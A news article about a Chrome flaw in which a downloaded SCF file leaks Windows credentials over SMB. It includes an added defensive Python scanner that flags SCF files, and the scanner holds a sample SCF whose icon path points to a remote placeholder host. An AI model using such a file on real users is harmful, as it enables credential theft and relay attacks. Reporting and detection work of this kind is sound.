Another major flaw has been discovered, and this time it’s in Google Chrome. It’s said that this one could give attackers access to the victim’s device and let them steal Windows credentials. It can even be used to launch SMB relay attacks.
It was discovered by Bosko Stankovic, a security engineer at DefenseCode. Stankovic has published a blog post in which he claims that a single click on a malicious link could result in the download and installation of an SCF file.
The file doesn’t do much until the download directory is opened in a window. That triggers the SCF, which tries to retrieve an icon for the file the victim believes they downloaded. To do so, the computer sends the user’s credentials to a remote server, which reveals exactly the information the hacker is after.
Stankovic has stated that the remote server stands ready to capture the victim’s credentials. Basically, all the hacker needs to do is tempt the next victim into visiting the malicious website; after that, they can reuse the credentials. This works even if the victim isn’t an administrator or any other kind of privileged user.
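A defender-side check for the mechanism described above, added here as an example (it is not from the article or from DefenseCode): it parses the IconFile entry of .scf files in a download folder and flags those whose icon would be fetched over a UNC path from an external host. The SCF sample and the hostnames in it are constructed placeholders.

```python
import ipaddress
import re
from pathlib import Path
from typing import List, Optional, Tuple

# Constructed minimal SCF sample in the shape the article describes: the
# IconFile entry points at a UNC path, so opening the folder makes Windows
# fetch the icon over SMB and present the user's credentials to that host.
# The hostname is a placeholder, not a real indicator.
SAMPLE_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\cdn.example.net\\icons\\report.ico\r\n"

UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")


def icon_target(scf_text: str) -> Optional[str]:
    """Return the IconFile value of an SCF file, or None if there is none."""
    for line in scf_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "iconfile":
            return value.strip()
    return None


def is_external_host(host: str) -> bool:
    """Public IP addresses and dotted DNS names count as external; private
    addresses and single-label (NetBIOS-style) names count as internal."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return "." in host


def classify_scf(scf_text: str) -> str:
    """Classify one SCF file by where its icon is loaded from."""
    target = icon_target(scf_text)
    if target is None:
        return "no-icon"
    match = UNC_HOST_RE.match(target)
    if match is None:
        return "local-icon"      # e.g. %SystemRoot%\system32\shell32.dll,3
    if is_external_host(match.group(1)):
        return "remote-icon"     # credentials would leave the network
    return "internal-unc"        # worth a look, but not the case in the article


def scan_downloads(directory: Path) -> List[Tuple[str, str]]:
    """Classify every .scf file under a directory such as the user's Downloads."""
    return [(p.name, classify_scf(p.read_text(errors="replace")))
            for p in directory.rglob("*.scf")]


if __name__ == "__main__":
    print(classify_scf(SAMPLE_SCF))  # remote-icon
    for name, verdict in scan_downloads(Path.home() / "Downloads"):
        print(name, verdict)
```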
This, of course, poses a very large threat to companies and other organizations, since hackers can use this method to impersonate members of pretty much any organization. Once they’ve gained some basic privileges, they could use those to escalate their access and carry out further attacks until they reach the organization’s IT resources. And that’s without even mentioning the SMB relay attack, which is also a possibility at any time.
Stankovic has said that companies that use NTLM as their authentication method and grant remote access to Microsoft Exchange and similar services can be, and probably are, extremely vulnerable to SMB relay attacks. Attackers could also simply impersonate a member of the victimized organization and gain access to all of its systems and data without even needing to crack any passwords.
He has also stated that Google has been notified about the issue and that he hopes a fix will be released soon.
Cal Leeming, CEO of Lyons Leeming and himself a convicted hacker, has commented that he finds this attack very interesting. He also said that the best mitigation for attacks like these is to block SMB traffic externally.
Mark Wardlow, a security consultant at SureCloud, has stated that this vulnerability affects only Google Chrome and that it requires a certain level of user interaction.
Still, he believes that if a fake web page is constructed carefully, tricking the user into triggering this attack shouldn’t be too difficult. He also said that the organizations most at risk are those that don’t control software installation on their computers, as well as those that allow the use of Google Chrome.